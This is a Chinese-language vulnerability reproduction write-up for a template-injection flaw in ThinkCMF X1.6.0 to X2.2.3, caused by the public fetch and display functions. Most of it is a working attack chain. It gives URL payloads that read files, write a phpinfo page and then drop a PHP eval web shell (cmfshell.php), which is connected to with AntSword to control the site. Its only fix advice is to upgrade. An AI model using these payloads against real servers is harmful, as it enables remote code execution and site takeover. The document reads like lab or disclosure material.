漏洞描述：

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制，框架自身提供基础的管理功能，而开发者可以根据自身的需求以应用的形式进行扩展。

每个应用都能独立的完成自己的任务，也可通过系统调用其他应用进行协同工作。在这种运行机制下，开发商场应用的用户无需关心开发SNS应用是如何工作的，但他们之间又可通过系统本身进行协调，大大的降低了开发成本和沟通成本。

在ThinkCMF X1.6.0至ThinkCMF X2.2.3之间存在安全漏洞，引起漏洞的最主要的问题是因为fetch函数和display函数是public类型。

fetch函数的作用是获取页面内容，调用内置模板引擎fetch方法，thinkphp的模版引擎使用的是smarty，在smarty中当key和value可控时便可以形成模板注入。

display函数的作用是加载模板和页面输出，所对应的参数为：templateFile模板文件地址，charset模板字符集，contentType输出类型，content输出内容。

fetch和display的用法差不多，二者的区别就是display方法直接输出模板文件渲染后的内容，而fetch方法是返回模板文件渲染后的内容。

由于这个代码漏洞，攻击者可以构造恶意url造成文件包含/上传漏洞，向服务器写入任意内容的文件，达到远程代码执行的目的。

复现过程：

1.访问http://ip:port，出现如下页面，开始实验

2.读取readme.md文件

/?a=display&templateFile=README.md

3.构造payload，写入phpinfo函数至test.php文件中

/?a=fetch&templateFile=public/index&prefix=%27%27&content=<php>file_put_contents(%27test.php%27,%27<?php%20phpinfo();%20?>%27)</php>

返回空白页面

4.读取test.php文件,获取phpinfo页面信息

5.上传Getshell文件

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('cmfshell.php','<?php @eval($_POST[123]); ?>')</php>

6.蚁剑连接，Getshell

http://ip:port/cmfshell.php

借此漏洞攻击者获取到网站的shell权限，控制整个网站，可以进行文件读取和命令执行。

修复建议：

1.升级版本。